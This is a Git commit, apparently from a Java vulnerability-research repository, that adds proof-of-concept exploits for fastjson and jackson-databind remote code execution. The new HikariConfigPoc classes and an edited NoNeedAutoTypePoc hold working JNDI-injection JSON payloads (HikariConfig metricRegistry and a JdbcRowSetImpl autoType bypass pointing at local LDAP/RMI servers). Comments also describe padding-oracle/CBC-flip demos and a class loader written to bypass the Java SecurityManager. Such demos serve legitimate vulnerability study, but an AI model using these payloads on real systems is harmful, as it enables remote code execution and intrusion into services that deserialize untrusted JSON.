feat:fastjson <= 1.2.59、jackson-databind <= 2.7.9.6、<= 2.8.11.4、<= 2.9.9.3的RCE测试demo

xuanyh · xuanyh · commit ee90b0b08810 · 2019-12-05T11:48:42.000+08:00
diff --git a/lib/fastjson-1.2.59.jar b/lib/fastjson-1.2.59.jar
diff --git a/pom.xml b/pom.xml
@@ -40,12 +40,12 @@
       <version>1.7.6</version>
     </dependency>
 
-    <!-- fastjson -->
-    <dependency>
-      <groupId>com.alibaba</groupId>
-      <artifactId>fastJson</artifactId>
-      <version>1.2.47</version>
-    </dependency>
+<!--    &lt;!&ndash; fastjson &ndash;&gt;-->
+<!--    <dependency>-->
+<!--      <groupId>com.alibaba</groupId>-->
+<!--      <artifactId>fastJson</artifactId>-->
+<!--      <version>1.2.59</version>-->
+<!--    </dependency>-->
 
     <!-- jsonkson -->
     <dependency>
@@ -56,7 +56,7 @@
     <dependency>
       <groupId>com.fasterxml.jackson.core</groupId>
       <artifactId>jackson-databind</artifactId>
-      <version>2.9.8</version>
+      <version>2.7.9.6</version>
     </dependency>
 
     <!-- ldap -->
@@ -126,6 +126,26 @@
       <artifactId>vjkit</artifactId>
       <version>1.0.8</version>
     </dependency>
+
+    <dependency>
+      <groupId>org.dom4j</groupId>
+      <artifactId>dom4j</artifactId>
+      <version>2.0.0</version>
+    </dependency>
+
+    <dependency>
+      <groupId>org.jdom</groupId>
+      <artifactId>jdom</artifactId>
+      <version>1.1.3</version>
+    </dependency>
+
+
+    <!-- https://mvnrepository.com/artifact/hikari-cp/hikari-cp -->
+    <dependency>
+      <groupId>com.zaxxer</groupId>
+      <artifactId>HikariCP</artifactId>
+      <version>3.4.1</version>
+    </dependency>
   </dependencies>
 
   <build>
diff --git a/src/main/java/com/threedr3am/bug/fastjson/HikariConfigPoc.java b/src/main/java/com/threedr3am/bug/fastjson/HikariConfigPoc.java
@@ -0,0 +1,33 @@
+package com.threedr3am.bug.fastjson;
+
+import com.alibaba.fastjson.JSON;
+import com.alibaba.fastjson.parser.ParserConfig;
+import com.threedr3am.bug.server.LdapServer;
+
+/**
+ * fastjson <= 1.2.59 RCE，需要开启AutoType
+ *
+ * @author threedr3am
+ */
+public class HikariConfigPoc {
+
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) {
+    //TODO 使用rmi server模式时，jdk版本高的需要开启URLCodebase trust
+//    System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
+
+
+    ParserConfig.global.setAutoTypeSupport(true);
+
+//    String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://localhost:43657/Calc\"}";
+    String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"ldap://localhost:43658/Calc\"}";
+    JSON.parse(payload);
+  }
+}
diff --git a/src/main/java/com/threedr3am/bug/fastjson/NoNeedAutoTypePoc.java b/src/main/java/com/threedr3am/bug/fastjson/NoNeedAutoTypePoc.java
@@ -27,8 +27,7 @@ public static void main(String[] args) {
     * TODO checkAutoType方法的缺陷（先通过缓存查询，有则立马返回，JdbcRowSetImpl否则检查黑名单hash）绕过黑名单和autoType的检查
     */
 //    String payload = "[{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:43657/Calc\",\"autoCommit\":true}]";//rmi方式
-    String payload = "{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"}";
-//    String payload = "[{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:43658/Calc\",\"autoCommit\":true}]";//ldap方式
+    String payload = "[{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:43658/Calc\",\"autoCommit\":true}]";//ldap方式
     JSON.parse(payload);
     //所以，该payload需要分两步进行
   }
diff --git a/src/main/java/com/threedr3am/bug/jackson/HikariConfigPoc.java b/src/main/java/com/threedr3am/bug/jackson/HikariConfigPoc.java
@@ -0,0 +1,34 @@
+package com.threedr3am.bug.jackson;
+
+import com.alibaba.fastjson.JSON;
+import com.alibaba.fastjson.parser.ParserConfig;
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.threedr3am.bug.server.LdapServer;
+import java.io.IOException;
+
+/**
+ * jackson-databind <= 2.7.9.6、<= 2.8.11.4、<= 2.9.9.3 RCE，需要开启DefaultType
+ *
+ * @author threedr3am
+ */
+public class HikariConfigPoc {
+
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) throws IOException {
+    //TODO 使用rmi server模式时，jdk版本高的需要开启URLCodebase trust
+//    System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
+
+    ObjectMapper mapper = new ObjectMapper();
+    mapper.enableDefaultTyping();
+
+//    mapper.readValue("[\"com.zaxxer.hikari.HikariConfig\", {\"metricRegistry\":\"rmi://localhost:43657/Calc\"}]", Object.class);
+    mapper.readValue("[\"com.zaxxer.hikari.HikariConfig\", {\"metricRegistry\":\"ldap://localhost:43658/Calc\"}]", Object.class);
+  }
+}
diff --git a/src/main/java/com/threedr3am/bug/paddingoraclecbc/package-info.java b/src/main/java/com/threedr3am/bug/paddingoraclecbc/package-info.java
@@ -0,0 +1,8 @@
+/**
+ * 类PaddingOracleCBC编写了小于等于16字节的字符的PaddingOracle和CBC翻转攻击的demo
+ *
+ * 类PaddingOracleCBC2编写了大于16字节的字符的PaddingOracle和CBC翻转攻击的demo
+ *
+ * @author xuanyh
+ */
+package com.threedr3am.bug.paddingoraclecbc;
diff --git a/src/main/java/com/threedr3am/bug/security/manager/AttackTest.java b/src/main/java/com/threedr3am/bug/security/manager/AttackTest.java
@@ -114,6 +114,9 @@ public static void main(String[] args)
 
 }
 
+/**
+ * 自定义的类加载器，在加载类的时候给予类全部权限，从而使加载的恶意class能越权执行
+ */
 class MyClassLoader extends ClassLoader {
 
   @Override
diff --git a/src/main/java/com/threedr3am/bug/security/manager/package-info.java b/src/main/java/com/threedr3am/bug/security/manager/package-info.java
@@ -0,0 +1,9 @@
+/**
+ * CodeBaseTest简单描述Java SecurityManager的使用
+ *
+ * AttackTest尝试以多种方式去对Java SecurityManager进行绕过，越权执行操作
+ *
+ *
+ * @author xuanyh
+ */
+package com.threedr3am.bug.security.manager;

Original file line number	Diff line number	Diff line change
`@@ -114,6 +114,9 @@ public static void main(String[] args)`
`114`	`114`
`115`	`115`	`}`
`116`	`116`
	`117`	`+/**`
	`118`	`+ * 自定义的类加载器，在加载类的时候给予类全部权限，从而使加载的恶意class能越权执行`
	`119`	`+ */`
`117`	`120`	`class MyClassLoader extends ClassLoader {`
`118`	`121`
`119`	`122`	`@Override`